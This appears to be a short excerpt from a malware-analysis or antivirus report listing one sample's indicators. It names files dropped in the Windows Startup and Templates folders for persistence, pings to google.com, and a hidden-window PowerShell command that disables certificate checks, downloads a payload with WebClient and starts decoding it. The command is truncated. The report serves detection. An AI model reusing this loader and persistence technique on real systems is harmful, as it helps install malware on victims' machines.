Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\blndbncze.url
- %APPDATA%\microsoft\windows\templates\blndbncze.vbe
- DNS ASK google.com
- '<SYSTEM32>\ping.exe' google.com' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$gynadjG=(New-Object Net.WebClient).DownloadData('http://')#for ($i=0;$i -lt $gynadjG.Length;$i++){$gynadjG[$i]=[byte]($gy...' (with hidden window)
- '<SYSTEM32>\ping.exe' google.com